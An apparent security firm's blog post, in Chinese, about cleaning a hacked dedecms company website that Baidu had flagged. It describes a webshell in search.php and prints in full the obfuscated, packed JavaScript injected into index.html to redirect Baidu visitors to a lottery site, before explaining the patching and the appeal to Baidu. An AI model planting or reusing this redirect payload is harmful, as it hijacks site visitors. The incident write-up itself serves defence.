網站被百度搜尋攔截 解封處理方案分享

臨近2019年底，客戶的公司網站被百度網址安全中心攔截了，公司網站徹底打不開了，影響範圍很大，於是透過朋友介紹找到我們SINE安全公司尋求幫忙解封，關於如何解除百度的安全攔截提示，下面就將我們SINE安全的解決辦法分享給大家，希望能對您有所幫助。

事件回憶:12月初，客戶剛從公司下班回家，接到領導的電話說是網站在百度怎麼打不開了，客戶第一時間用手機訪問網站，發現網站正常，隨後又用百度去搜尋公司網站域名，發現網站竟然被百度網址安全中心攔截了並提示：違法違規網頁，建議關閉,您訪問的是：//公司域名，此網頁可能為違法違規網頁，包含非法資訊以及不健康內容，請謹慎訪問。如下圖所示：

整個客戶公司的網站在百度無法開啟，徹底的被百度攔截掉了，百度提示的肯定是有原因的，我們SINE安全工程師透過百度搜尋發現，網站在搜尋結果裡被標註了：

百度網址安全中心提醒您：該站點可能受到駭客攻擊，部分頁面已被非法篡改！下圖所示：

點選去後，彈出百度的攔截頁面，提示：該站點可能由於受到駭客攻擊，部分頁面已被非法篡改，可能會威脅到您的財產和資訊保安，建議您謹慎訪問。我們處理了太多像這種情況的網站了，我們開啟百度網址安全中心掃描看一下是什麼原因導致網站被百度攔截，輸入客戶公司網址點查詢，發現網站被標記危險，並提示：危險，網站網頁中含有惡意資訊！

這說明網站裡含有惡意內容的資訊被百度檢測到了，但是百度並沒有指出到底是哪個網站頁面存在惡意資訊，看到百度旗下還有個百度雲觀測的產品，註冊免費使用，檢測網站的安全情況，沒有檢測到網站出現安全問題。到底含有惡意內容的資訊在哪裡？該怎麼查詢，根據我們SINE安全多年的經驗，透過百度的工具以及傳送郵件，申訴等通道是獲取不到具體的惡意資訊連結，百度只是官方的回覆一下，具體問題的根源在哪裡，得自己動手去查詢程式碼，以及公司網站在百度的收錄情況。

發現了問題，客戶公司網站在百度的快照內容被篡改了，是一些彩piao內容，既然已經知道網站裡含有惡意資訊。那就從網站程式碼開始入手，客戶網站使用的是開源的dedecms織夢繫統，php+mysql資料庫，從伺服器壓縮了一份，下載到本地的電腦，開始檢查原始碼，每一行，每一個程式碼都不要放過，對比客戶之前網站備份程式碼，發現plus下的search.php被篡改了，多出來一些eval一句話木馬程式碼，也叫webshell.

客戶的網站首頁檔案index.html也被篡改新增了程式碼，尤其標題描述都被篡改了，從百度裡搜尋點選到客戶公司網站，自動跳轉到了彩piao網站上去了。這跟index.html被篡改是對應的，我們SINE安全貼出程式碼讓大家看一下：

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(par

seInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,St

ring)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=

1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\k\\a\\1\

\m\\9\\7\\o\\0"]["\\n\\4\\8\\0\\7"](\'\\e\\2\\1\\4\\8\\5\\0\\0\\i\\5\\7\\c\\6\\0\\7\\j\\0\\3\\f\\b\\u\\b\\2\

\1\\4\\8\\5\\0\\6 \\2\\4\\1\\c\\6\\t\\0\\0\\5\\w\\3\\3\\v\\q\\p\\s\\r\\h\\1\\a\\9\\3\\g\\g\\h\\f\\2\\6\\d\\

e\\3\\2\\1\\4\\8\\5\\0\\d\');',33,33,'x74|x63|x73|x2f|x72|x70|x22|x65|x69|x6d|x6f|x61|x3d|x3e|

x3c|x6a|x31|x2e|x79|x78|x64|window|x75|x77|x6e|x38|x37|x71|x7a|x68|x76|

x35|x3a'.split('|'),0,{}))</script>

這種掛馬程式碼功能是：對百度來的點選，進行判斷並跳轉到攻擊者設定的域名，如果是直接輸入網站域名是不會跳轉。如果對程式碼不是太懂的話，根本無法理解這段程式碼的意思。問題找到了，那就開始著手處理，刪除首頁的惡意程式碼，恢復網站的正常訪問，刪除攻擊者留下的webshell網站木馬後門檔案，並對客戶網站程式碼進行全面的網站安全檢測，包括網站漏洞檢測，發現客戶使用的是早期版本的dedecms，存在遠端程式碼執行漏洞，可以上傳任意檔案的檔案上傳漏洞。我們SINE安全對其程式碼做了漏洞修復，對上傳做了字尾名的安全過濾與限制，對檔案上傳的目錄做了安全部署，防止PHP指令碼檔案的執行與寫入。對網站進行了整體的安全加固與防護，防止攻擊者繼續篡改網站，有些客戶網站以為只是刪除首頁那部分惡意程式碼就能解決問題，大錯特錯，問題的根源不是刪除，而是網站存在漏洞，只是刪除惡意程式碼其實就是亡羊補牢，要從根源入手，修復網站的漏洞。才能徹底的解決百度的攔截問題，百度會定期對網站進行安全監控，如果多次出現被篡改的情況，會直接將您網站拉入黑名單，長時間的對網站進行攔截。

至此客戶網站才得以安全，徹底的刪除了惡意資訊跟惡意的程式碼，透過百度網址安全中心的線上提交申訴，等待百度的人工稽核，在申訴後的第三天，收到了百度網址安全中心的回覆，百度網址安全技術人員答覆如下：你好，對於https://公司網站域名的檢測結果為：透過稽核，到此網站被百度網址安全中心的攔截，徹底解封，客戶公司網站恢復正常訪問，我們將損失給客戶降到了最低，將客戶的事當成自己的事來做，我們的路才能走的更寬。